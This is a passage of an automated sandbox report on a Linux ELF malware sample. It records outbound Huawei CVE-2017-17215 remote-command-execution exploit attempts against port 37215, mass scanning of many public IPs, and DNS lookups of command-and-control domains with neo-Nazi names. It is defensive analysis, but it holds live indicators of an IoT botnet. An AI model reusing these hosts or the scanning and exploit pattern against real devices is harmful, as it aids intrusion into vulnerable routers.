Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59250 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58610 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35792 -> 37215

ELF contains segments with high entropy indicating compressed/encrypted content

Source: ul5RjxwWTK.elf	Submission file: segment LOAD with 7.895 entropy (max. 8.0)
Source: ul5RjxwWTK.elf	Submission file: segment LOAD with 7.9701 entropy (max. 8.0)

Screenshots

No Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
41.124.88.200	unknown	South Africa	16637	MTNNS-ASZA	false
197.26.6.223	unknown	Tunisia	37492	ORANGE-TN	false
197.165.56.18	unknown	Egypt	24863	LINKdotNET-ASEG	false
197.59.205.63	unknown	Egypt	8452	TE-ASTE-ASEG	false
197.201.220.199	unknown	Algeria	36947	ALGTEL-ASDZ	false
141.19.207.102	unknown	Germany	553	BELWUEBelWue-KoordinationEU	false
197.39.177.17	unknown	Egypt	8452	TE-ASTE-ASEG	false
157.108.11.213	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
157.146.249.222	unknown	United States	719	ELISA-ASHelsinkiFinlandEU	false
197.58.66.153	unknown	Egypt	8452	TE-ASTE-ASEG	false
157.71.244.47	unknown	Japan	131932	JEIS-NETJREastInformationSystemsCompanyJP	false
41.241.171.251	unknown	Sudan	36998	SDN-MOBITELSD	false
157.129.143.142	unknown	Finland	41701	CAP-FIN-ASFI	false
134.142.180.254	unknown	United Kingdom	32432	COFANUS	false
41.169.198.161	unknown	South Africa	36937	Neotel-ASZA	false
157.54.150.109	unknown	United States	3598	MICROSOFT-CORP-ASUS	false
197.142.68.127	unknown	Algeria	36891	ICOSNET-ASDZ	false
41.102.161.51	unknown	Algeria	36947	ALGTEL-ASDZ	false
157.49.96.24	unknown	India	55836	RELIANCEJIO-INRelianceJioInfocommLimitedIN	false
157.147.0.185	unknown	Japan	2527	SO-NETSo-netEntertainmentCorporationJP	false
41.183.9.71	unknown	South Africa	37028	FNBCONNECTZA	false
197.211.54.60	unknown	Nigeria	37148	globacom-asNG	false
126.173.136.60	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
37.185.172.226	unknown	Belgium	5432	PROXIMUS-ISP-ASBE	false
197.21.53.76	unknown	Tunisia	37693	TUNISIANATN	false
125.219.182.10	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
189.174.90.15	unknown	Mexico	8151	UninetSAdeCVMX	false
77.243.72.117	unknown	Malta	33874	VFM-ASVodafoneMaltaLtdASMT	false
122.188.108.200	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
197.60.120.42	unknown	Egypt	8452	TE-ASTE-ASEG	false
41.126.46.232	unknown	South Africa	16637	MTNNS-ASZA	false
27.4.89.176	unknown	India	17488	HATHWAY-NET-APHathwayIPOverCableInternetIN	false
157.157.210.226	unknown	Iceland	6677	ICENET-AS1IS	false
157.67.71.120	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
197.180.144.75	unknown	Kenya	33771	SAFARICOM-LIMITEDKE	false
41.236.237.204	unknown	Egypt	8452	TE-ASTE-ASEG	false
153.180.232.29	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
41.42.142.169	unknown	Egypt	8452	TE-ASTE-ASEG	false
104.36.232.36	unknown	United States	54755	DWW-ASUS	false
41.209.184.247	unknown	unknown	36974	AFNET-ASCI	false
197.102.171.178	unknown	South Africa	3741	ISZA	false
107.236.196.239	unknown	United States	20057	ATT-MOBILITY-LLC-AS20057US	false
41.145.166.59	unknown	South Africa	5713	SAIX-NETZA	false
197.195.85.232	unknown	Egypt	36992	ETISALAT-MISREG	false
74.14.172.74	unknown	Canada	577	BACOMCA	false
157.29.22.30	unknown	Italy	8968	BT-ITALIAIT	false
178.86.249.207	unknown	Saudi Arabia	25019	SAUDINETSTC-ASSA	false
45.237.182.91	unknown	Brazil	268283	NETWORKFIBERCOMERCIOESERVICOSDECOMUNICACAOBR	false
123.43.9.51	unknown	Korea Republic of	6619	SAMSUNGSDS-AS-KRSamsungSDSIncKR	false
157.74.39.39	unknown	Japan	131932	JEIS-NETJREastInformationSystemsCompanyJP	false
157.123.84.117	unknown	United States	17623	CNCGROUP-SZChinaUnicomShenzennetworkCN	false
157.97.120.189	unknown	Netherlands	201975	UNISCAPEBIT-ServicesHostingNL	false
41.91.211.148	unknown	Egypt	37069	MOBINILEG	false
41.151.131.146	unknown	South Africa	5713	SAIX-NETZA	false
157.118.211.35	unknown	Japan	58785	TGU-NETTohokuGakuinUniversityJP	false
41.192.221.205	unknown	South Africa	29975	VODACOM-ZA	false
157.25.93.70	unknown	Poland	5588	GTSCEGTSCentralEuropeAntelGermanyCZ	false
41.131.118.232	unknown	Egypt	24863	LINKdotNET-ASEG	false
70.67.13.8	unknown	Canada	6327	SHAWCA	false
197.66.178.241	unknown	South Africa	16637	MTNNS-ASZA	false
32.222.182.230	unknown	United States	46690	SNET-FCCUS	false
157.63.154.101	unknown	Japan	2907	SINET-ASResearchOrganizationofInformationandSystemsN	false
206.232.91.86	unknown	United States	174	COGENT-174US	false
41.239.231.105	unknown	Egypt	8452	TE-ASTE-ASEG	false
95.142.39.247	unknown	Russian Federation	210079	EUROBYTEEurobyteLLCMoscowRussiaRU	false
157.22.104.136	unknown	United States	397379	NLN-ASN-01US	false
197.126.108.1	unknown	Egypt	36992	ETISALAT-MISREG	false
32.43.37.119	unknown	United States	7018	ATT-INTERNET4US	false
197.4.42.168	unknown	Tunisia	5438	ATI-TN	false
197.138.104.232	unknown	Kenya	36914	KENET-ASKE	false
197.204.101.18	unknown	Algeria	36947	ALGTEL-ASDZ	false
197.19.165.192	unknown	Tunisia	37693	TUNISIANATN	false
157.125.200.78	unknown	Sweden	31655	ASN-GAMMATELECOMGB	false
157.97.255.157	unknown	Netherlands	198089	IPVN-AS01NL	false
197.152.240.64	unknown	Tanzania United Republic of	37133	airtel-tz-asTZ	false
20.1.13.62	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
197.69.47.21	unknown	South Africa	16637	MTNNS-ASZA	false
157.0.211.55	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
118.74.68.114	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
41.169.50.40	unknown	South Africa	36937	Neotel-ASZA	false
81.191.112.250	unknown	Norway	2116	ASN-CATCHCOMNO	false
41.194.17.108	unknown	South Africa	22351	INTELSAT-1US	false
41.160.135.138	unknown	South Africa	36937	Neotel-ASZA	false
41.157.117.183	unknown	South Africa	37168	CELL-CZA	false
41.131.142.3	unknown	Egypt	24863	LINKdotNET-ASEG	false
157.191.246.59	unknown	United States	394452	MCKINSEY-US-AWPUS	false
5.114.220.65	unknown	Iran (ISLAMIC Republic Of)	44244	IRANCELL-ASIR	false
157.21.250.103	unknown	United States	53446	EVMSUS	false
50.124.154.58	unknown	United States	5650	FRONTIER-FRTRUS	false
157.141.252.56	unknown	United States	27064	DNIC-ASBLK-27032-27159US	false
197.96.161.15	unknown	South Africa	3741	ISZA	false
41.223.56.131	unknown	Kenya	36926	CKL1-ASNKE	false
41.98.224.16	unknown	Algeria	36947	ALGTEL-ASDZ	false
157.168.242.58	unknown	Switzerland	22192	SSHENETUS	false
157.137.73.180	unknown	United States	2200	FR-RENATERReseauNationaldetelecommunicationspourlaTec	false
157.130.157.103	unknown	United States	701	UUNETUS	false
41.96.85.17	unknown	Algeria	36947	ALGTEL-ASDZ	false
52.95.193.192	unknown	United States	16509	AMAZON-02US	false
197.97.115.202	unknown	South Africa	3741	ISZA	false
41.225.142.145	unknown	Tunisia	37671	GLOBALNET-ASTN	false

Contacted Domains

Name	IP	Active
security.rebirth-network.su	212.70.149.10	true
kz.adolfhitler.su.?}"f66PV,PV!E(:65:0?}"fNNPV!PV,E@.@@q'5,0kzadolfhitlersun?}"f_<<PV!PV,E(k8@J_	unknown	unknown
kz.adolfhitler.su.8}"f}<<PV!PV,E(@5F_FP]98}"f~<<PV!PV,	unknown	unknown
kz.adolfhitler.su.?}"f?66PV,PV!E(\Ar_AsP?}"f-RRPV,PV!ED	unknown	unknown
kz.adolfhitler.su.$}"f66PV,PV!E((b@2#o)__)`P$}"f'66PV,PV!E(()	unknown	unknown
kz.adolfhitler.su.3}"f'<<PV!PV,E(X@Wy_WyP]gD3}"f,<<PV!PV,	unknown	unknown
siegheil.hiter.su.B}"f166PV,PV!E(}3==5\QB}"f2NNPV!PV,E@9	unknown	unknown
kz.adolfhitler.su.)}"f66PV,PV!E(@+_P;)}"f66PV,PV!EH(	unknown	unknown
siegheil.hiter.su.C}"f6FFPV,PV!E8c7,Ti%E(c87Ti_TiC}"f<FFPV	unknown	unknown
siegheil.hiter.su.C}"fRRPV,PV!EHDy+E(I:4dP_PP]\C}"fk	unknown	unknown
kz.adolfhitler.su..}"f2]RRPV,PV!EDyQUE(a.8_8P].}"f	unknown	unknown
siegheil.hiter.su.B}"f'66PV,PV!E((H]@.aq_arPB}"f(66PV,PV!E(.1?=5{4B}"fNNPV!PV,E@9@@GV=5,).iegheilhitersunB}"f166PV,PV!E(}3==5\QB}"f2NNPV!.V,E@9@@G>=5,siegheilhitersunB}"f76	unknown	unknown
siegheil.hiter.su.B}"f766PV,PV!EH(wwq}_~P/B}"fXXPV,PV!EJK.4\|E(+~5_5P]kB}"fK<<PV!PV,E.@y_P]	unknown	unknown
kz.adolfhitler.su.?}"f_<<PV!PV,E(k8@J_JP]7?}"f_<<PV!PV,	unknown	unknown
kz.adolfhitler.su.?}"fJx66PV,PV!E(%:'50?}"fxNNPV!PV,E@.@@y5,0kzadolfhitlersun?}"f66PV,PV!E(:6	unknown	unknown
kz.adolfhitler.su.?}"fLRRPV,PV!EDr)d*E($2"E_EP]F?}"f$P	unknown	unknown

AV Detection

Multi AV Scanner detection for submitted file

Source: ul5RjxwWTK.elf

ReversingLabs: Detection: 21%

Machine Learning detection for sample

Source: ul5RjxwWTK.elf

Joe Sandbox ML: detected

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34688 -> 31.200.68.93:37215
Source: Traffic	Snort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34688 -> 31.200.68.93:37215
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41692 -> 163.191.34.49:37215
Source: Traffic	Snort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41692 -> 163.191.34.49:37215
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59250 -> 94.123.19.233:37215
Source: Traffic	Snort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59250 -> 94.123.19.233:37215
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58610 -> 83.66.57.104:37215
Source: Traffic	Snort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58610 -> 83.66.57.104:37215
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35792 -> 147.47.79.157:37215
Source: Traffic	Snort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35792 -> 147.47.79.157:37215

Queries the IP of a very long domain name

Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.$}"f66PV,PV!E((b@2#o)__)`P$}"f'66PV,PV!E(()
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.)}"f66PV,PV!E(@+_P;)}"f66PV,PV!EH(
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su..}"f2]RRPV,PV!EDyQUE(a.8_8P].}"f
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.3}"f'<<PV!PV,E(X@Wy_WyP]gD3}"f,<<PV!PV,
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.8}"f}<<PV!PV,E(@5F_FP]98}"f~<<PV!PV,
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.?}"fLRRPV,PV!EDr)d*E($2"E_EP]F?}"f$P
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.?}"fJx66PV,PV!E(%:'50?}"fxNNPV!PV,E@.@@y5,0kzadolfhitlersun?}"f66PV,PV!E(:6
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.?}"f66PV,PV!E(:65:0?}"fNNPV!PV,E@.@@q'5,0kzadolfhitlersun?}"f_<<PV!PV,E(k8@J_
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.?}"f_<<PV!PV,E(k8@J_JP]7?}"f_<<PV!PV,
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.?}"f?66PV,PV!E(\Ar_AsP?}"f-RRPV,PV!ED
Source: unknown	DNS traffic detected: query: siegheil.hiter.su.B}"f'66PV,PV!E((H]@.aq_arPB}"f(66PV,PV!E(.1?=5{4B}"fNNPV!PV,E@9@@GV=5,).iegheilhitersunB}"f166PV,PV!E(}3==5\QB}"f2NNPV!.V,E@9@@G>=5,siegheilhitersunB}"f76
Source: unknown	DNS traffic detected: query: siegheil.hiter.su.B}"f166PV,PV!E(}3==5\QB}"f2NNPV!PV,E@9
Source: unknown	DNS traffic detected: query: siegheil.hiter.su.B}"f766PV,PV!EH(wwq}_~P/B}"fXXPV,PV!EJK.4\|E(+~5_5P]kB}"fK<<PV!PV,E.@y_P]
Source: unknown	DNS traffic detected: query: siegheil.hiter.su.C}"f6FFPV,PV!E8c7,Ti%E(c87Ti_TiC}"f<FFPV
Source: unknown	DNS traffic detected: query: siegheil.hiter.su.C}"fRRPV,PV!EHDy+E(I:4dP_PP]\C}"fk

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 34688 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59250 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58610 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35792 -> 37215

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.43.138.117:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.199.46.51:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 220.45.152.133:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.202.20.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.226.217.5:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.148.57.191:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.82.58.188:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.90.182.81:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.177.191.34:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 185.43.20.146:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 84.113.211.26:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.218.51.50:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.71.199.98:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 105.71.149.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.223.217.46:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 205.100.192.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 198.104.199.41:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 104.190.185.49:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.170.156.84:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.178.248.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.251.62.132:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 82.153.137.13:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.157.159.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.53.30.248:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.138.254.90:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.57.129.112:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.121.183.43:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 64.235.3.161:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.137.17.160:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 97.172.198.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.23.242.135:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 183.18.78.201:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.134.38.202:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.74.204.95:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.171.71.249:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.109.56.254:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 101.247.147.46:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 147.19.19.242:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.117.192.227:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.63.15.50:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.24.122.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.57.158.162:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.92.235.136:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.77.179.171:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 135.200.78.17:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 158.6.148.254:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.109.141.56:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.93.140.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.54.89.212:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.55.232.15:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.195.109.12:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 145.231.236.34:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.47.101.106:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.53.18.167:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.197.78.165:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.191.119.93:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.2.224.19:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.63.187.194:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.225.34.198:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.232.224.202:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.193.179.245:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.161.23.174:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.51.112.152:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.169.125.2:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.84.57.98:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.84.134.186:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.136.252.92:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 111.248.83.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 96.149.167.171:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.131.23.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.85.148.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 188.59.160.132:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.155.58.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.158.120.167:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.79.146.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.116.176.156:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.163.242.234:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.129.37.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.56.243.215:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 117.43.236.255:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 114.45.57.201:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.115.239.51:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.155.37.83:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.102.70.8:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 59.70.64.2:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.252.165.73:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.213.197.199:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.63.188.70:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 110.94.171.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 189.233.81.186:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.152.176.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.207.34.33:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.162.176.217:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 131.83.17.238:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.252.252.225:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.163.253.52:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.158.27.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.39.62.78:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.100.116.132:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 48.138.78.143:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.180.113.227:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.140.56.163:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 23.138.239.15:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.218.235.42:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 124.73.14.226:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 53.57.252.84:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.112.14.207:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 67.200.141.77:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.86.126.188:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 93.62.63.169:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.69.240.198:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.141.167.203:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.67.20.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.110.169.233:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.203.34.224:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 53.20.111.242:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.215.204.164:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.81.163.217:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 176.1.230.109:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.0.236.19:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.182.91.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.122.139.249:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.39.117.173:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.47.233.118:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.16.178.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 200.234.193.218:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.245.252.33:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.191.45.60:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.222.144.134:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.161.221.216:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.114.204.107:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.74.122.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.243.230.10:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.79.111.161:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 31.56.59.90:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.241.208.17:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.15.150.60:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.126.244.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.253.99.89:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 148.250.129.132:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 73.91.73.103:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.136.236.113:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.209.185.108:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 84.227.173.40:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.59.198.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.122.130.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.11.238.50:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 191.154.83.82:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.46.96.186:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 148.140.84.182:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.149.114.68:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.10.143.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.222.209.165:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.137.116.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.219.229.47:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.9.39.97:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.100.215.88:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 97.2.87.62:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.145.10.248:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.150.195.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.211.75.148:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 81.153.6.89:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.45.214.42:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.140.97.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.58.182.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.212.125.69:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 183.27.198.119:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.150.44.228:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 154.58.2.73:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 1.20.136.197:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.254.25.255:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.87.146.218:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.252.3.173:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.48.253.111:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 40.105.130.5:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.68.243.236:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.242.89.161:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 122.218.232.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 65.185.44.183:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.150.205.218:37215
